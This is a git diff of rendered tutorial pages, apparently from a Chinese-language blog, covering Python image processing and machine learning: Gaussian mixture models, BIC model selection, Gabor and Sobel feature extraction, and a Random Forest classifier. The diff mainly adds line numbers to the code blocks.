                    1
                    2
                    3
                    from sklearn.datasets import make_blobs
                    import numpy as np
                    from matplotlib import pyplot as plt
                    • Generate some data
                    -
                    X, y_true = make_blobs(n_samples=400, centers=4,
                    cluster_std=0.60, random_state=0)
                    X = X[:, ::-1] # flip axes for better plotting 翻转坐标轴可以更好地绘图

                    rng = np.random.RandomState(13)
                    X_stretched = np.dot(X, rng.randn(2, 2))
                    plt.scatter(X_stretched[:, 0], X_stretched[:, 1], s=7, cmap='viridis')
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    X, y_true = make_blobs(n_samples=400, centers=4,
                    cluster_std=0.60, random_state=0)
                    X = X[:, ::-1] # flip axes for better plotting 翻转坐标轴可以更好地绘图

                    rng = np.random.RandomState(13)
                    X_stretched = np.dot(X, rng.randn(2, 2))
                    plt.scatter(X_stretched[:, 0], X_stretched[:, 1], s=7, cmap='viridis')
                    <matplotlib.collections.PathCollection at 0x1fc9eac9310>
                     

                    png

                    -
                    from sklearn.mixture import GaussianMixture as GMM

                    gmm = GMM(n_components=4, covariance_type='full', random_state=42)
                    -
                    from matplotlib.patches import Ellipse


                    def draw_ellipse(position, covariance, ax=None, **kwargs):
                    """
                    Draw an ellipse with a given position and covariance
                    画一个具有给定位置和协方差的椭圆
                    """
                    ax = ax or plt.gca()

                    # Convert covariance to principal axes 将协方差转换为主轴
                    if covariance.shape == (2, 2):
                    U, s, Vt = np.linalg.svd(covariance)
                    angle = np.degrees(np.arctan2(U[1, 0], U[0, 0]))
                    width, height = 2 * np.sqrt(s)
                    else:
                    angle = 0
                    width, height = 2 * np.sqrt(covariance)

                    # Draw the Ellipse
                    for nsig in range(1, 4):
                    ax.add_patch(Ellipse(position, nsig * width, nsig * height,
                    angle, **kwargs))


                    def plot_gmm(gmm, X, label=True, ax=None):
                    ax = ax or plt.gca()
                    labels = gmm.fit(X).predict(X)
                    if label:
                    ax.scatter(X[:, 0], X[:, 1], c=labels, s=7, cmap='viridis', zorder=2)
                    else:
                    ax.scatter(X[:, 0], X[:, 1], s=7, zorder=2)
                    ax.axis('equal')

                    w_factor = 0.2 / gmm.weights_.max()
                    for pos, covar, w in zip(gmm.means_, gmm.covariances_, gmm.weights_):
                    draw_ellipse(pos, covar, alpha=w * w_factor)
                    -
                    plot_gmm(gmm, X_stretched)
                    +
                    1
                    2
                    3
                    from sklearn.mixture import GaussianMixture as GMM

                    gmm = GMM(n_components=4, covariance_type='full', random_state=42)
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    10
                    11
                    12
                    13
                    14
                    15
                    16
                    17
                    18
                    19
                    20
                    21
                    22
                    23
                    24
                    25
                    26
                    27
                    28
                    29
                    30
                    31
                    32
                    33
                    34
                    35
                    36
                    37
                    from matplotlib.patches import Ellipse


                    def draw_ellipse(position, covariance, ax=None, **kwargs):
                    """
                    Draw an ellipse with a given position and covariance
                    画一个具有给定位置和协方差的椭圆
                    """
                    ax = ax or plt.gca()

                    # Convert covariance to principal axes 将协方差转换为主轴
                    if covariance.shape == (2, 2):
                    U, s, Vt = np.linalg.svd(covariance)
                    angle = np.degrees(np.arctan2(U[1, 0], U[0, 0]))
                    width, height = 2 * np.sqrt(s)
                    else:
                    angle = 0
                    width, height = 2 * np.sqrt(covariance)

                    # Draw the Ellipse
                    for nsig in range(1, 4):
                    ax.add_patch(Ellipse(position, nsig * width, nsig * height,
                    angle, **kwargs))


                    def plot_gmm(gmm, X, label=True, ax=None):
                    ax = ax or plt.gca()
                    labels = gmm.fit(X).predict(X)
                    if label:
                    ax.scatter(X[:, 0], X[:, 1], c=labels, s=7, cmap='viridis', zorder=2)
                    else:
                    ax.scatter(X[:, 0], X[:, 1], s=7, zorder=2)
                    ax.axis('equal')

                    w_factor = 0.2 / gmm.weights_.max()
                    for pos, covar, w in zip(gmm.means_, gmm.covariances_, gmm.weights_):
                    draw_ellipse(pos, covar, alpha=w * w_factor)
                    +
                    1
                    plot_gmm(gmm, X_stretched)

                    png


                    3D

                    -
                    import numpy as np
                    from sklearn.mixture import GaussianMixture
                    from matplotlib import pyplot as plt
                    +
                    1
                    2
                    3
                    import numpy as np
                    from sklearn.mixture import GaussianMixture
                    from matplotlib import pyplot as plt
                    • Generate 3D data with 4 clusters set gaussian ceters and covariances in 3D
                        @@ -703,32 +701,32 @@

                        means = np.array([[0.5, 0.0, 0.0],
                        [0.0, 0.0, 0.0],
                        [-0.5, -0.5, -0.5],
                        [-0.8, 0.3, 0.4]])

                        covs = np.array([np.diag([0.01, 0.01, 0.03]),
                        np.diag([0.08, 0.01, 0.01]),
                        np.diag([0.01, 0.05, 0.01]),
                        np.diag([0.03, 0.07, 0.01])])

                        n_gaussians = means.shape[0] # Number of clusters 集群数量

                        N = 1000 # Number of points to be generated for each cluster. 为每个集群生成的点数。
                        points = []
                        for i in range(len(means)):
                        x = np.random.multivariate_normal(means[i], covs[i], N )
                        points.append(x)
                        points = np.concatenate(points)
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        8
                        9
                        10
                        11
                        12
                        13
                        14
                        15
                        16
                        17
                        18
                        means = np.array([[0.5, 0.0, 0.0],
                        [0.0, 0.0, 0.0],
                        [-0.5, -0.5, -0.5],
                        [-0.8, 0.3, 0.4]])

                        covs = np.array([np.diag([0.01, 0.01, 0.03]),
                        np.diag([0.08, 0.01, 0.01]),
                        np.diag([0.01, 0.05, 0.01]),
                        np.diag([0.03, 0.07, 0.01])])

                        n_gaussians = means.shape[0] # Number of clusters 集群数量

                        N = 1000 # Number of points to be generated for each cluster. 为每个集群生成的点数。
                        points = []
                        for i in range(len(means)):
                        x = np.random.multivariate_normal(means[i], covs[i], N )
                        points.append(x)
                        points = np.concatenate(points)
                        • Plot
                        -
                        fig = plt.figure()
                        ax = fig.add_subplot(111, projection='3d')
                        ax.scatter(points[:,0], points[:,1], points[:,2], s=1, alpha=1)
                        ax.view_init(35.246, 45)
                        plt.show()
                        +
                        1
                        2
                        3
                        4
                        5
                        fig = plt.figure()
                        ax = fig.add_subplot(111, projection='3d')
                        ax.scatter(points[:,0], points[:,1], points[:,2], s=1, alpha=1)
                        ax.view_init(35.246, 45)
                        plt.show()

                        png

                        • Fit the gaussian model
                        -
                        gmm = GaussianMixture(n_components=n_gaussians, covariance_type='diag')
                        gmm.fit(points)
                        +
                        1
                        2
                        gmm = GaussianMixture(n_components=n_gaussians, covariance_type='diag')
                        gmm.fit(points)
                        • Functions to visualize data 可视化数据的函数
                        -
                        import matplotlib.cm as cmx


                        def plot_sphere(w=0, c=[0,0,0], r=[1, 1, 1], subdev=10, ax=None, sigma_multiplier=3):
                        '''
                        plot a sphere surface
                        Input:
                        c: 3 elements list, sphere center
                        r: 3 element list, sphere original scale in each axis ( allowing to draw elipsoids)
                        subdiv: scalar, number of subdivisions (subdivision^2 points sampled on the surface)
                        ax: optional pyplot axis object to plot the sphere in.
                        sigma_multiplier: sphere additional scale (choosing an std value when plotting gaussians)
                        Output:
                        ax: pyplot axis object
                        '''

                        if ax is None:
                        fig = plt.figure()
                        ax = fig.add_subplot(111, projection='3d')
                        pi = np.pi
                        cos = np.cos
                        sin = np.sin
                        phi, theta = np.mgrid[0.0:pi:complex(0,subdev), 0.0:2.0 * pi:complex(0,subdev)]
                        x = sigma_multiplier*r[0] * sin(phi) * cos(theta) + c[0]
                        y = sigma_multiplier*r[1] * sin(phi) * sin(theta) + c[1]
                        z = sigma_multiplier*r[2] * cos(phi) + c[2]
                        cmap = cmx.ScalarMappable()
                        cmap.set_cmap('jet')
                        c = cmap.to_rgba(w)

                        ax.plot_surface(x, y, z, color=c, alpha=0.2, linewidth=1)

                        return ax


                        def visualize_3d_gmm(points, w, mu, stdev):
                        '''
                        plots points and their corresponding gmm model in 3D
                        Input:
                        points: N X 3, sampled points
                        w: n_gaussians, gmm weights
                        mu: 3 X n_gaussians, gmm means
                        stdev: 3 X n_gaussians, gmm standard deviation (assuming diagonal covariance matrix)
                        Output:
                        None
                        '''

                        n_gaussians = mu.shape[1]
                        N = int(np.round(points.shape[0] / n_gaussians))
                        # Visualize data
                        fig = plt.figure(figsize=(8, 8))
                        axes = fig.add_subplot(111, projection='3d')
                        axes.set_xlim([-1, 1])
                        axes.set_ylim([-1, 1])
                        axes.set_zlim([-1, 1])
                        plt.set_cmap('Set1')
                        colors = cmx.Set1(np.linspace(0, 1, n_gaussians))
                        for i in range(n_gaussians):
                        idx = range(i * N, (i + 1) * N)
                        axes.scatter(points[idx, 0], points[idx, 1], points[idx, 2], alpha=0.3, c=colors[i])
                        plot_sphere(w=w[i], c=mu[:, i], r=stdev[:, i], ax=axes)

                        plt.title('3D GMM')
                        axes.set_xlabel('X')
                        axes.set_ylabel('Y')
                        axes.set_zlabel('Z')
                        axes.view_init(35.246, 45)
                        plt.show()
                        -
                        visualize_3d_gmm(points, gmm.weights_, gmm.means_.T, np.sqrt(gmm.covariances_).T)
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        8
                        9
                        10
                        11
                        12
                        13
                        14
                        15
                        16
                        17
                        18
                        19
                        20
                        21
                        22
                        23
                        24
                        25
                        26
                        27
                        28
                        29
                        30
                        31
                        32
                        33
                        34
                        35
                        36
                        37
                        38
                        39
                        40
                        41
                        42
                        43
                        44
                        45
                        46
                        47
                        48
                        49
                        50
                        51
                        52
                        53
                        54
                        55
                        56
                        57
                        58
                        59
                        60
                        61
                        62
                        63
                        64
                        65
                        66
                        67
                        68
                        import matplotlib.cm as cmx


                        def plot_sphere(w=0, c=[0,0,0], r=[1, 1, 1], subdev=10, ax=None, sigma_multiplier=3):
                        '''
                        plot a sphere surface
                        Input:
                        c: 3 elements list, sphere center
                        r: 3 element list, sphere original scale in each axis ( allowing to draw elipsoids)
                        subdiv: scalar, number of subdivisions (subdivision^2 points sampled on the surface)
                        ax: optional pyplot axis object to plot the sphere in.
                        sigma_multiplier: sphere additional scale (choosing an std value when plotting gaussians)
                        Output:
                        ax: pyplot axis object
                        '''

                        if ax is None:
                        fig = plt.figure()
                        ax = fig.add_subplot(111, projection='3d')
                        pi = np.pi
                        cos = np.cos
                        sin = np.sin
                        phi, theta = np.mgrid[0.0:pi:complex(0,subdev), 0.0:2.0 * pi:complex(0,subdev)]
                        x = sigma_multiplier*r[0] * sin(phi) * cos(theta) + c[0]
                        y = sigma_multiplier*r[1] * sin(phi) * sin(theta) + c[1]
                        z = sigma_multiplier*r[2] * cos(phi) + c[2]
                        cmap = cmx.ScalarMappable()
                        cmap.set_cmap('jet')
                        c = cmap.to_rgba(w)

                        ax.plot_surface(x, y, z, color=c, alpha=0.2, linewidth=1)

                        return ax


                        def visualize_3d_gmm(points, w, mu, stdev):
                        '''
                        plots points and their corresponding gmm model in 3D
                        Input:
                        points: N X 3, sampled points
                        w: n_gaussians, gmm weights
                        mu: 3 X n_gaussians, gmm means
                        stdev: 3 X n_gaussians, gmm standard deviation (assuming diagonal covariance matrix)
                        Output:
                        None
                        '''

                        n_gaussians = mu.shape[1]
                        N = int(np.round(points.shape[0] / n_gaussians))
                        # Visualize data
                        fig = plt.figure(figsize=(8, 8))
                        axes = fig.add_subplot(111, projection='3d')
                        axes.set_xlim([-1, 1])
                        axes.set_ylim([-1, 1])
                        axes.set_zlim([-1, 1])
                        plt.set_cmap('Set1')
                        colors = cmx.Set1(np.linspace(0, 1, n_gaussians))
                        for i in range(n_gaussians):
                        idx = range(i * N, (i + 1) * N)
                        axes.scatter(points[idx, 0], points[idx, 1], points[idx, 2], alpha=0.3, c=colors[i])
                        plot_sphere(w=w[i], c=mu[:, i], r=stdev[:, i], ax=axes)

                        plt.title('3D GMM')
                        axes.set_xlabel('X')
                        axes.set_ylabel('Y')
                        axes.set_zlabel('Z')
                        axes.view_init(35.246, 45)
                        plt.show()
                        +
                        1
                        visualize_3d_gmm(points, gmm.weights_, gmm.means_.T, np.sqrt(gmm.covariances_).T)

                        png

                        53 - How to pick optimal number of parameters for your unsupervised machine learning model

                        -
                        import numpy as np
                        import cv2
                        from matplotlib import pyplot as plt

                        img = cv2.imread('images/alloy.jpg')
                        img2 = img.reshape((-1, 3))
                        plt.imshow(img)
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        import numpy as np
                        import cv2
                        from matplotlib import pyplot as plt

                        img = cv2.imread('images/alloy.jpg')
                        img2 = img.reshape((-1, 3))
                        plt.imshow(img)
                        <matplotlib.image.AxesImage at 0x2650b465fd0>
                         

                        png

                        -
                        from sklearn.mixture import GaussianMixture as GMM

                        n_components = np.arange(1, 10)
                        gmm_models = [GMM(n, covariance_type='tied').fit(img2) for n in n_components]
                        -
                        plt.plot(n_components, [m.bic(img2) for m in gmm_models], label='BIC')
                        plt.xlabel('n_components')
                        +
                        1
                        2
                        3
                        4
                        from sklearn.mixture import GaussianMixture as GMM

                        n_components = np.arange(1, 10)
                        gmm_models = [GMM(n, covariance_type='tied').fit(img2) for n in n_components]
                        +
                        1
                        2
                        plt.plot(n_components, [m.bic(img2) for m in gmm_models], label='BIC')
                        plt.xlabel('n_components')
                        Text(0.5, 0, 'n_components')
                         

                        png

                        @@ -4767,6 +4765,8 @@

                        目录

                        var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/DIP-Python tutorials for image processing and machine learning(55-58)-Supervised Learning/index.html b/posts/DIP-Python tutorials for image processing and machine learning(55-58)-Supervised Learning/index.html index 78c443218d..cef1872a0c 100644 --- a/posts/DIP-Python tutorials for image processing and machine learning(55-58)-Supervised Learning/index.html +++ b/posts/DIP-Python tutorials for image processing and machine learning(55-58)-Supervised Learning/index.html @@ -44,8 +44,6 @@ - - @@ -408,7 +406,7 @@

                        57 - How to generate features in Python for machine learning

                        -
                        import matplotlib.pyplot as plt
                        import cv2

                        img = cv2.imread('images/scratch.jpg', 0)
                        plt.imshow(img, cmap='gray')
                        +
                        1
                        2
                        3
                        4
                        5
                        import matplotlib.pyplot as plt
                        import cv2

                        img = cv2.imread('images/scratch.jpg', 0)
                        plt.imshow(img, cmap='gray')
                        <matplotlib.image.AxesImage at 0x181098b9220>
                         

                        png

                        @@ -420,7 +418,7 @@

                        from skimage.filters.rank import entropy
                        from skimage.morphology import disk

                        entropy_img = entropy(img, disk(1))
                        plt.imshow(entropy_img, cmap='gray')
                        +
                        1
                        2
                        3
                        4
                        5
                        from skimage.filters.rank import entropy
                        from skimage.morphology import disk

                        entropy_img = entropy(img, disk(1))
                        plt.imshow(entropy_img, cmap='gray')
                        <matplotlib.image.AxesImage at 0x1810981b2e0>
                         

                        png

                        @@ -428,19 +426,19 @@

                        import matplotlib.pyplot as plt
                        import cv2
                        from skimage.filters.rank import entropy
                        from skimage.morphology import disk

                        img = cv2.imread('images/Yeast_Cells.png', 0)
                        entropy_img = entropy(img, disk(1))

                        fig = plt.figure(figsize=(10, 10))

                        ax1 = fig.add_subplot(121)
                        ax1.imshow(img, cmap='gray')
                        ax1.title.set_text('img')

                        ax2 = fig.add_subplot(122)
                        ax2.imshow(entropy_img, cmap='gray')
                        ax2.title.set_text('entropy_img')
                        plt.show()
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        8
                        9
                        10
                        11
                        12
                        13
                        14
                        15
                        16
                        17
                        18
                        import matplotlib.pyplot as plt
                        import cv2
                        from skimage.filters.rank import entropy
                        from skimage.morphology import disk

                        img = cv2.imread('images/Yeast_Cells.png', 0)
                        entropy_img = entropy(img, disk(1))

                        fig = plt.figure(figsize=(10, 10))

                        ax1 = fig.add_subplot(121)
                        ax1.imshow(img, cmap='gray')
                        ax1.title.set_text('img')

                        ax2 = fig.add_subplot(122)
                        ax2.imshow(entropy_img, cmap='gray')
                        ax2.title.set_text('entropy_img')
                        plt.show()

                        png


                        • 使用 Sobel 过滤器
                        -
                        import matplotlib.pyplot as plt
                        import cv2
                        from skimage.filters.rank import entropy
                        from skimage.morphology import disk

                        img = cv2.imread('images/Yeast_Cells.png', 0)
                        entropy_img = entropy(img, disk(1))

                        from scipy import ndimage as nd

                        gaussian_img = nd.gaussian_filter(img, sigma=3)

                        from skimage.filters import sobel

                        sobel_img = sobel(img)

                        fig = plt.figure(figsize=(10, 10))

                        ax1 = fig.add_subplot(131)
                        ax1.imshow(img, cmap='gray')
                        ax1.title.set_text('img')

                        ax2 = fig.add_subplot(132)
                        ax2.imshow(gaussian_img, cmap='gray')
                        ax2.title.set_text('gaussian_img')

                        ax3 = fig.add_subplot(133)
                        ax3.imshow(sobel_img, cmap='gray')
                        ax3.title.set_text('sobel_img')

                        plt.show()
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        8
                        9
                        10
                        11
                        12
                        13
                        14
                        15
                        16
                        17
                        18
                        19
                        20
                        21
                        22
                        23
                        24
                        25
                        26
                        27
                        28
                        29
                        30
                        31
                        import matplotlib.pyplot as plt
                        import cv2
                        from skimage.filters.rank import entropy
                        from skimage.morphology import disk

                        img = cv2.imread('images/Yeast_Cells.png', 0)
                        entropy_img = entropy(img, disk(1))

                        from scipy import ndimage as nd

                        gaussian_img = nd.gaussian_filter(img, sigma=3)

                        from skimage.filters import sobel

                        sobel_img = sobel(img)

                        fig = plt.figure(figsize=(10, 10))

                        ax1 = fig.add_subplot(131)
                        ax1.imshow(img, cmap='gray')
                        ax1.title.set_text('img')

                        ax2 = fig.add_subplot(132)
                        ax2.imshow(gaussian_img, cmap='gray')
                        ax2.title.set_text('gaussian_img')

                        ax3 = fig.add_subplot(133)
                        ax3.imshow(sobel_img, cmap='gray')
                        ax3.title.set_text('sobel_img')

                        plt.show()

                        png


                        • 使用 Pandas 统计数据用于机器学习
                        -
                        import matplotlib.pyplot as plt
                        import cv2
                        from skimage.filters.rank import entropy
                        from skimage.morphology import disk
                        from scipy import ndimage as nd
                        from skimage.filters import sobel
                        import pandas as pd

                        img = cv2.imread('images/Yeast_Cells.png', 0)
                        img2 = img.reshape(-1)

                        df = pd.DataFrame()
                        df['Original Pixel Values'] = img2

                        entropy_img = entropy(img, disk(1))
                        entropy1 = entropy_img.reshape(-1)
                        df['Entropy'] = entropy1

                        gaussian_img = nd.gaussian_filter(img, sigma=3)
                        gaussian1 = gaussian_img.reshape(-1)
                        df['Gaussian'] = gaussian1

                        sobel_img = sobel(img)
                        sobel1 = sobel_img.reshape(-1)
                        df['Sobel'] = sobel1

                        df
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        8
                        9
                        10
                        11
                        12
                        13
                        14
                        15
                        16
                        17
                        18
                        19
                        20
                        21
                        22
                        23
                        24
                        25
                        26
                        27
                        import matplotlib.pyplot as plt
                        import cv2
                        from skimage.filters.rank import entropy
                        from skimage.morphology import disk
                        from scipy import ndimage as nd
                        from skimage.filters import sobel
                        import pandas as pd

                        img = cv2.imread('images/Yeast_Cells.png', 0)
                        img2 = img.reshape(-1)

                        df = pd.DataFrame()
                        df['Original Pixel Values'] = img2

                        entropy_img = entropy(img, disk(1))
                        entropy1 = entropy_img.reshape(-1)
                        df['Entropy'] = entropy1

                        gaussian_img = nd.gaussian_filter(img, sigma=3)
                        gaussian1 = gaussian_img.reshape(-1)
                        df['Gaussian'] = gaussian1

                        sobel_img = sobel(img)
                        sobel1 = sobel_img.reshape(-1)
                        df['Sobel'] = sobel1

                        df
                        @@ -590,12 +588,12 @@

                        # kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, phi, ktype=cv2.CV_32F)
                        -
                        import numpy as np
                        import cv2
                        import matplotlib.pyplot as plt

                        ksize = 5
                        sigma = 3
                        theta = 1 * np.pi / 4
                        lamda = 1 * np.pi / 4
                        gamma = 0.5
                        phi = 0

                        kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, phi, ktype=cv2.CV_32F)
                        plt.imshow(kernel, cmap='gray')
                        +
                        1
                        # kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, phi, ktype=cv2.CV_32F)
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        8
                        9
                        10
                        11
                        12
                        13
                        import numpy as np
                        import cv2
                        import matplotlib.pyplot as plt

                        ksize = 5
                        sigma = 3
                        theta = 1 * np.pi / 4
                        lamda = 1 * np.pi / 4
                        gamma = 0.5
                        phi = 0

                        kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, phi, ktype=cv2.CV_32F)
                        plt.imshow(kernel, cmap='gray')
                        <matplotlib.image.AxesImage at 0x2021c8e8d90>
                         

                        png

                        -
                        img = cv2.imread('images/synthetic.jpg', 0)
                        plt.imshow(img, cmap='gray')
                        +
                        1
                        2
                        img = cv2.imread('images/synthetic.jpg', 0)
                        plt.imshow(img, cmap='gray')
                        <matplotlib.image.AxesImage at 0x2021c966fd0>
                         

                        png

                        @@ -607,13 +605,13 @@

                        OpenCV 图像卷积:cv.filter2D() 函数详解

                      -
                      fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
                      plt.imshow(fimg, cmap='gray')
                      +
                      1
                      2
                      fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
                      plt.imshow(fimg, cmap='gray')
                      <matplotlib.image.AxesImage at 0x2021c9bec40>
                       

                      png


                      通过修改 $\theta$ 的值来使 Gabor 过滤器识别右下斜线。

                      -
                      import numpy as np
                      import cv2
                      import matplotlib.pyplot as plt

                      ksize = 5
                      sigma = 3
                      theta = 3 * np.pi / 4
                      lamda = 1 * np.pi / 4
                      gamma = 0.5
                      phi = 0

                      kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, phi, ktype=cv2.CV_32F)
                      fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
                      plt.imshow(fimg, cmap='gray')
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      10
                      11
                      12
                      13
                      14
                      import numpy as np
                      import cv2
                      import matplotlib.pyplot as plt

                      ksize = 5
                      sigma = 3
                      theta = 3 * np.pi / 4
                      lamda = 1 * np.pi / 4
                      gamma = 0.5
                      phi = 0

                      kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, phi, ktype=cv2.CV_32F)
                      fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
                      plt.imshow(fimg, cmap='gray')
                      <matplotlib.image.AxesImage at 0x2021c697b20>
                       

                      png

                      @@ -4649,6 +4647,8 @@

                      目录

                      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/DIP-Python tutorials for image processing and machine learning(59-67)-Random Forest Classifier/index.html b/posts/DIP-Python tutorials for image processing and machine learning(59-67)-Random Forest Classifier/index.html index 7982a69fb2..eeaff44a2d 100644 --- a/posts/DIP-Python tutorials for image processing and machine learning(59-67)-Random Forest Classifier/index.html +++ b/posts/DIP-Python tutorials for image processing and machine learning(59-67)-Random Forest Classifier/index.html @@ -44,8 +44,6 @@ - - @@ -488,7 +486,7 @@

                      60 - How to use Random Forest in Python

                      -
                      import pandas as pd
                      import matplotlib.pyplot as plt
                      import numpy as np

                      df = pd.read_csv('data/images_analyzed_productivity1.csv')
                      df.head()
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      import pandas as pd
                      import matplotlib.pyplot as plt
                      import numpy as np

                      df = pd.read_csv('data/images_analyzed_productivity1.csv')
                      df.head()
                      @@ -549,13 +547,13 @@

                      sizes = df['Productivity'].value_counts(sort=1)
                      sizes
                      +
                      1
                      2
                      sizes = df['Productivity'].value_counts(sort=1)
                      sizes
                      Bad     42
                       Good    38
                       Name: Productivity, dtype: int64
                       

                      去除无关的列

                      -
                      df.drop(['Images_Analyzed'], axis=1, inplace=True)
                      df.drop(['User'], axis=1, inplace=True)
                      df.head()
                      +
                      1
                      2
                      3
                      df.drop(['Images_Analyzed'], axis=1, inplace=True)
                      df.drop(['User'], axis=1, inplace=True)
                      df.head()
                      @@ -605,9 +603,9 @@

                      df = df.dropna()
                      +
                      1
                      df = df.dropna()

                      将分析结果转换为数字

                      -
                      df.Productivity[df.Productivity == 'Good'] = 1
                      df.Productivity[df.Productivity == 'Bad'] = 2
                      df.head()
                      +
                      1
                      2
                      3
                      df.Productivity[df.Productivity == 'Good'] = 1
                      df.Productivity[df.Productivity == 'Bad'] = 2
                      df.head()
                      @@ -657,32 +655,32 @@

                      Y = df['Productivity'].values
                      Y = Y.astype('int')
                      Y
                      +
                      1
                      2
                      3
                      Y = df['Productivity'].values
                      Y = Y.astype('int')
                      Y
                      array([1, 2, 1, 2, 1, 2, 1, 1, 1, 2, 1, 1, 1, 2, 2, 2, 1, 2, 1, 2, 1, 2,
                              1, 2, 1, 2, 1, 2, 1, 2, 2, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 1,
                              1, 2, 2, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 2, 2, 1, 2,
                              1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 2, 2])
                       

                      定义自变量

                      -
                      X = df.drop(labels=['Productivity'], axis=1)
                      +
                      1
                      X = df.drop(labels=['Productivity'], axis=1)

                      将数据分割为训练集和测试集

                      -
                      from sklearn.model_selection import train_test_split

                      X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.4, random_state=20)
                      +
                      1
                      2
                      3
                      from sklearn.model_selection import train_test_split

                      X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.4, random_state=20)

                      使用随机森林

                      sklearn.ensemble.RandomForestClassifier

                      -
                      from sklearn.ensemble import RandomForestClassifier

                      model = RandomForestClassifier(n_estimators=10, random_state=30)
                      model.fit(X_train, Y_train)
                      prediction_test = model.predict(X_test)
                      prediction_test
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      from sklearn.ensemble import RandomForestClassifier

                      model = RandomForestClassifier(n_estimators=10, random_state=30)
                      model.fit(X_train, Y_train)
                      prediction_test = model.predict(X_test)
                      prediction_test
                      array([1, 1, 2, 1, 2, 1, 1, 1, 2, 1, 1, 1, 2, 2, 2, 1, 2, 1, 1, 2, 1, 2,
                              1, 1, 2, 1, 1, 2, 1, 1, 1, 1])
                       

                      计算训练出的结果的精确度

                      -
                      from sklearn import metrics

                      print('Accuracy =', metrics.accuracy_score(Y_test, prediction_test))
                      +
                      1
                      2
                      3
                      from sklearn import metrics

                      print('Accuracy =', metrics.accuracy_score(Y_test, prediction_test))
                      Accuracy = 0.9375
                       

                      扩大训练集的比例可以增加精确度

                      -
                      X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2, random_state=20)
                      model = RandomForestClassifier(n_estimators=10, random_state=30)
                      model.fit(X_train, Y_train)
                      prediction_test = model.predict(X_test)
                      prediction_test
                      print('Accuracy =', metrics.accuracy_score(Y_test, prediction_test))
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2, random_state=20)
                      model = RandomForestClassifier(n_estimators=10, random_state=30)
                      model.fit(X_train, Y_train)
                      prediction_test = model.predict(X_test)
                      prediction_test
                      print('Accuracy =', metrics.accuracy_score(Y_test, prediction_test))
                      Accuracy = 0.9375
                       

                      显示特征值的重要性

                      -
                      feature_list = list(X.columns)
                      feature_imp = pd.Series(model.feature_importances_, index=feature_list).sort_values(ascending=False)
                      feature_imp
                      +
                      1
                      2
                      3
                      feature_list = list(X.columns)
                      feature_imp = pd.Series(model.feature_importances_, index=feature_list).sort_values(ascending=False)
                      feature_imp
                      Time      0.714433
                       Coffee    0.205474
                       Age       0.080092
                      @@ -690,12 +688,12 @@ 

                      python 随机森林可视化_阿雷吖睚的博客-CSDN 博客_随机森林可视化

                      -
                      from IPython.display import HTML, display
                      from sklearn import tree
                      import pydotplus

                      estimators = model.estimators_
                      for m in estimators:
                      dot_data = tree.export_graphviz(m, out_file=None,
                      feature_names=['Time', 'Coffee', 'Age'],
                      class_names=['Good', 'Bad'],
                      filled=True, rounded=True,
                      special_characters=True)
                      graph = pydotplus.graph_from_dot_data(dot_data)
                      # 使用 ipython 的终端 jupyter notebook 显示。
                      svg = graph.create_svg()
                      if hasattr(svg, "decode"):
                      svg = svg.decode("utf-8")
                      html = HTML(svg)
                      display(html)
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      10
                      11
                      12
                      13
                      14
                      15
                      16
                      17
                      18
                      from IPython.display import HTML, display
                      from sklearn import tree
                      import pydotplus

                      estimators = model.estimators_
                      for m in estimators:
                      dot_data = tree.export_graphviz(m, out_file=None,
                      feature_names=['Time', 'Coffee', 'Age'],
                      class_names=['Good', 'Bad'],
                      filled=True, rounded=True,
                      special_characters=True)
                      graph = pydotplus.graph_from_dot_data(dot_data)
                      # 使用 ipython 的终端 jupyter notebook 显示。
                      svg = graph.create_svg()
                      if hasattr(svg, "decode"):
                      svg = svg.decode("utf-8")
                      html = HTML(svg)
                      display(html)

                      svg

                      61 - How to create Gabor feature banks for machine learning

                      -
                      import numpy as np
                      import cv2
                      import matplotlib.pyplot as plt
                      import pandas as pd
                      -
                      img = cv2.imread('images/synthetic.jpg', 0)
                      -
                      df = pd.DataFrame()
                      img2 = img.reshape(-1)
                      df['Original Pixels'] = img2
                      df
                      +
                      1
                      2
                      3
                      4
                      import numpy as np
                      import cv2
                      import matplotlib.pyplot as plt
                      import pandas as pd
                      +
                      1
                      img = cv2.imread('images/synthetic.jpg', 0)
                      +
                      1
                      2
                      3
                      4
                      df = pd.DataFrame()
                      img2 = img.reshape(-1)
                      df['Original Pixels'] = img2
                      df
                      @@ -752,8 +750,8 @@

                      num = 1
                      for sigma in (3, 5):
                      for theta in range(2):
                      theta = theta / 4. * np.pi
                      for lamda in np.arange(0, np.pi, np.pi / 4.):
                      for gamma in (0.05, 0.5):
